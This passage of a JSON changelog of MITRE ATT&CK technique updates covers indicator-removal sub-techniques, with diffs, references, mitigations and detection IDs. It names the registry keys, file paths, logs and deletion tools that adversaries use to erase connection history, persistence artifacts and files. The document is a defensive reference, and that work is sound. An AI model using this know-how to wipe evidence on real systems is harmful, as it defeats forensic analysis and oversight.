or Modify System Firewall](https://attack.mitre.org/techniques/T1686) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/007",
                            "external_id": "T1070.007"
                        },
                        {
                            "source_name": "FreeDesktop Journal",
                            "description": "freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022.",
                            "url": "https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html"
                        },
                        {
                            "source_name": "Microsoft RDP Removal",
                            "description": "Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022.",
                            "url": "https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer"
                        },
                        {
                            "source_name": "Moran RDPieces",
                            "description": "Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022.",
                            "url": "https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf"
                        },
                        {
                            "source_name": "Apple Culprit Access",
                            "description": "rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022.",
                            "url": "https://discussions.apple.com/thread/3991574"
                        },
                        {
                            "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing",
                            "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.",
                            "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "CrowdStrike Falcon OverWatch"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows",
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 19:27:07.242000+00:00\", \"old_value\": \"2025-04-16 20:37:16.734000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\\n\\nNetwork connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):\\n\\n* <code>HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default</code>\\n* <code>HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Servers</code>\\n\\nWindows may also store information about recent RDP connections in files such as <code>C:\\\\Users\\\\\\\\%username%\\\\Documents\\\\Default.rdp</code> and `C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Terminal\\nServer Client\\\\Cache\\\\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\\n\\nMalicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1686) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.\", \"old_value\": \"Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\\n\\nNetwork connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):\\n\\n* <code>HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default</code>\\n* <code>HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Servers</code>\\n\\nWindows may also store information about recent RDP connections in files such as <code>C:\\\\Users\\\\\\\\%username%\\\\Documents\\\\Default.rdp</code> and `C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Terminal\\nServer Client\\\\Cache\\\\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\\n\\nMalicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.\", \"diff\": \"--- \\n+++ \\n@@ -8,4 +8,4 @@\\n Windows may also store information about recent RDP connections in files such as <code>C:\\\\Users\\\\\\\\%username%\\\\Documents\\\\Default.rdp</code> and `C:\\\\Users\\\\%username%\\\\AppData\\\\Local\\\\Microsoft\\\\Terminal\\n Server Client\\\\Cache\\\\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\\n \\n-Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.\\n+Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1686) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to10__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to10__0\"><a href=\"#difflib_chg_to10__top\">t</a></td><td class=\"diff_header\" id=\"from10_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;clear&nbsp;or&nbsp;remove&nbsp;evidence&nbsp;of&nbsp;malicious&nbsp;networ</td><td class=\"diff_next\"><a href=\"#difflib_chg_to10__top\">t</a></td><td class=\"diff_header\" id=\"to10_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;clear&nbsp;or&nbsp;remove&nbsp;evidence&nbsp;of&nbsp;malicious&nbsp;networ</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k&nbsp;connections&nbsp;in&nbsp;order&nbsp;to&nbsp;clean&nbsp;up&nbsp;traces&nbsp;of&nbsp;their&nbsp;operation</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k&nbsp;connections&nbsp;in&nbsp;order&nbsp;to&nbsp;clean&nbsp;up&nbsp;traces&nbsp;of&nbsp;their&nbsp;operation</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.&nbsp;Configuration&nbsp;settings&nbsp;as&nbsp;well&nbsp;as&nbsp;various&nbsp;artifacts&nbsp;that&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.&nbsp;Configuration&nbsp;settings&nbsp;as&nbsp;well&nbsp;as&nbsp;various&nbsp;artifacts&nbsp;that&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">highlight&nbsp;connection&nbsp;history&nbsp;may&nbsp;be&nbsp;created&nbsp;on&nbsp;a&nbsp;system&nbsp;and/</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">highlight&nbsp;connection&nbsp;history&nbsp;may&nbsp;be&nbsp;created&nbsp;on&nbsp;a&nbsp;system&nbsp;and/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;in&nbsp;application&nbsp;logs&nbsp;from&nbsp;behaviors&nbsp;that&nbsp;require&nbsp;network&nbsp;c</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;in&nbsp;application&nbsp;logs&nbsp;from&nbsp;behaviors&nbsp;that&nbsp;require&nbsp;network&nbsp;c</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">onnections,&nbsp;such&nbsp;as&nbsp;[Remote&nbsp;Services](https://attack.mitre.o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">onnections,&nbsp;such&nbsp;as&nbsp;[Remote&nbsp;Services](https://attack.mitre.o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rg/techniques/T1021)&nbsp;or&nbsp;[External&nbsp;Remote&nbsp;Services](https://a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rg/techniques/T1021)&nbsp;or&nbsp;[External&nbsp;Remote&nbsp;Services](https://a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttack.mitre.org/techniques/T1133).&nbsp;Defenders&nbsp;may&nbsp;use&nbsp;these&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttack.mitre.org/techniques/T1133).&nbsp;Defenders&nbsp;may&nbsp;use&nbsp;these&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rtifacts&nbsp;to&nbsp;monitor&nbsp;or&nbsp;otherwise&nbsp;analyze&nbsp;network&nbsp;connections</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rtifacts&nbsp;to&nbsp;monitor&nbsp;or&nbsp;otherwise&nbsp;analyze&nbsp;network&nbsp;connections</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;created&nbsp;by&nbsp;adversaries.&nbsp;&nbsp;Network&nbsp;connection&nbsp;history&nbsp;may&nbsp;be&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;created&nbsp;by&nbsp;adversaries.&nbsp;&nbsp;Network&nbsp;connection&nbsp;history&nbsp;may&nbsp;be&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stored&nbsp;in&nbsp;various&nbsp;locations.&nbsp;For&nbsp;example,&nbsp;RDP&nbsp;connection&nbsp;his</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stored&nbsp;in&nbsp;various&nbsp;locations.&nbsp;For&nbsp;example,&nbsp;RDP&nbsp;connection&nbsp;his</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tory&nbsp;may&nbsp;be&nbsp;stored&nbsp;in&nbsp;Windows&nbsp;Registry&nbsp;values&nbsp;under&nbsp;(Citatio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tory&nbsp;may&nbsp;be&nbsp;stored&nbsp;in&nbsp;Windows&nbsp;Registry&nbsp;values&nbsp;under&nbsp;(Citatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;Microsoft&nbsp;RDP&nbsp;Removal):&nbsp;&nbsp;*&nbsp;&lt;code&gt;HKEY_CURRENT_USER\\Softwa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;Microsoft&nbsp;RDP&nbsp;Removal):&nbsp;&nbsp;*&nbsp;&lt;code&gt;HKEY_CURRENT_USER\\Softwa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re\\Microsoft\\Terminal&nbsp;Server&nbsp;Client\\Default&lt;/code&gt;&nbsp;*&nbsp;&lt;code&gt;H</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re\\Microsoft\\Terminal&nbsp;Server&nbsp;Client\\Default&lt;/code&gt;&nbsp;*&nbsp;&lt;code&gt;H</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">KEY_CURRENT_USER\\Software\\Microsoft\\Terminal&nbsp;Server&nbsp;Client\\S</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">KEY_CURRENT_USER\\Software\\Microsoft\\Terminal&nbsp;Server&nbsp;Client\\S</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ervers&lt;/code&gt;&nbsp;&nbsp;Windows&nbsp;may&nbsp;also&nbsp;store&nbsp;information&nbsp;about&nbsp;rece</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ervers&lt;/code&gt;&nbsp;&nbsp;Windows&nbsp;may&nbsp;also&nbsp;store&nbsp;information&nbsp;about&nbsp;rece</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nt&nbsp;RDP&nbsp;connections&nbsp;in&nbsp;files&nbsp;such&nbsp;as&nbsp;&lt;code&gt;C:\\Users\\\\%usernam</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nt&nbsp;RDP&nbsp;connections&nbsp;in&nbsp;files&nbsp;such&nbsp;as&nbsp;&lt;code&gt;C:\\Users\\\\%usernam</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e%\\Documents\\Default.rdp&lt;/code&gt;&nbsp;and&nbsp;`C:\\Users\\%username%\\App</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e%\\Documents\\Default.rdp&lt;/code&gt;&nbsp;and&nbsp;`C:\\Users\\%username%\\App</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Data\\Local\\Microsoft\\Terminal&nbsp;Server&nbsp;Client\\Cache\\`.(Citatio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Data\\Local\\Microsoft\\Terminal&nbsp;Server&nbsp;Client\\Cache\\`.(Citatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;Moran&nbsp;RDPieces)&nbsp;Similarly,&nbsp;macOS&nbsp;and&nbsp;Linux&nbsp;hosts&nbsp;may&nbsp;stor</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;Moran&nbsp;RDPieces)&nbsp;Similarly,&nbsp;macOS&nbsp;and&nbsp;Linux&nbsp;hosts&nbsp;may&nbsp;stor</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;information&nbsp;highlighting&nbsp;connection&nbsp;history&nbsp;in&nbsp;system&nbsp;logs</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;information&nbsp;highlighting&nbsp;connection&nbsp;history&nbsp;in&nbsp;system&nbsp;logs</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;(such&nbsp;as&nbsp;those&nbsp;stored&nbsp;in&nbsp;`/Library/Logs`&nbsp;and/or&nbsp;`/var/log/`</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;(such&nbsp;as&nbsp;those&nbsp;stored&nbsp;in&nbsp;`/Library/Logs`&nbsp;and/or&nbsp;`/var/log/`</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">).(Citation:&nbsp;Apple&nbsp;Culprit&nbsp;Access)(Citation:&nbsp;FreeDesktop&nbsp;Jou</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">).(Citation:&nbsp;Apple&nbsp;Culprit&nbsp;Access)(Citation:&nbsp;FreeDesktop&nbsp;Jou</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rnal)(Citation:&nbsp;Apple&nbsp;Unified&nbsp;Log&nbsp;Analysis&nbsp;Remote&nbsp;Login&nbsp;and&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rnal)(Citation:&nbsp;Apple&nbsp;Unified&nbsp;Log&nbsp;Analysis&nbsp;Remote&nbsp;Login&nbsp;and&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Screen&nbsp;Sharing)&nbsp;&nbsp;Malicious&nbsp;network&nbsp;connections&nbsp;may&nbsp;also&nbsp;requ</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Screen&nbsp;Sharing)&nbsp;&nbsp;Malicious&nbsp;network&nbsp;connections&nbsp;may&nbsp;also&nbsp;requ</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ire&nbsp;changes&nbsp;to&nbsp;third-party&nbsp;applications&nbsp;or&nbsp;network&nbsp;configura</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ire&nbsp;changes&nbsp;to&nbsp;third-party&nbsp;applications&nbsp;or&nbsp;network&nbsp;configura</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;settings,&nbsp;such&nbsp;as&nbsp;[Disable&nbsp;or&nbsp;Modify&nbsp;System&nbsp;Firewall](h</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;settings,&nbsp;such&nbsp;as&nbsp;[Disable&nbsp;or&nbsp;Modify&nbsp;System&nbsp;Firewall](h</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/techniques/T1<span class=\"diff_sub\">5</span>6<span class=\"diff_chg\">2/004</span>)&nbsp;or&nbsp;tampering&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ttps://attack.mitre.org/techniques/T16<span class=\"diff_chg\">86</span>)&nbsp;or&nbsp;tampering&nbsp;to&nbsp;en</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;enable&nbsp;[Proxy](https://attack.mitre.org/techniques/T1090).</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">able&nbsp;[Proxy](https://attack.mitre.org/techniques/T1090).&nbsp;Adv</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Adversaries&nbsp;may&nbsp;delete&nbsp;or&nbsp;modify&nbsp;this&nbsp;data&nbsp;to&nbsp;conceal&nbsp;indic</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersaries&nbsp;may&nbsp;delete&nbsp;or&nbsp;modify&nbsp;this&nbsp;data&nbsp;to&nbsp;conceal&nbsp;indicator</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ators&nbsp;and/or&nbsp;impede&nbsp;defensive&nbsp;analysis.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;and/or&nbsp;impede&nbsp;defensive&nbsp;analysis.</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1024: Restrict Registry Permissions",
                            "M1029: Remote Data Storage"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0049: Behavioral Detection of Network History and Configuration Tampering"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-07-29 19:32:11.552000+00:00",
                    "modified": "2026-04-15 20:28:24.292000+00:00",
                    "name": "Clear Persistence",
                    "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)\n\nIn some instances, artifacts of persistence may also be removed once an adversary\u2019s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/009",
                            "external_id": "T1070.009"
                        },
                        {
                            "source_name": "Cylance Dust Storm",
                            "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.",
                            "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"
                        },
                        {
                            "source_name": "Talos - Cisco Attack 2022",
                            "description": "Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.",
                            "url": "https://blog.talosintelligence.com/recent-cyber-attack/"
                        },
                        {
                            "source_name": "NCC Group Team9 June 2020",
                            "description": "Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.",
                            "url": "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Gavin Knapp"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:28:24.292000+00:00\", \"old_value\": \"2025-04-16 20:37:21.515000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1029: Remote Data Storage"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0040: Detection of Persistence Artifact Removal Across Host Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-31 12:35:36.479000+00:00",
                    "modified": "2026-04-15 20:28:46.342000+00:00",
                    "name": "File Deletion",
                    "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows, <code>rm</code> or <code>unlink</code> on Linux and macOS, and `rm` on ESXi.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1070/004",
                            "external_id": "T1070.004"
                        },
                        {
                            "source_name": "Microsoft SDelete July 2016",
                            "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.",
                            "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Walker Johnson"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 20:28:46.342000+00:00\", \"old_value\": \"2025-10-24 17:49:27.978000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0140: Behavioral Detection of Malicious File Deletion"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-31 12:39:18.816000+00:00",
                    "modified": "2026-04-15 20:29:50.512000+00:00",
                    "name": "Network Share Connection Removal",
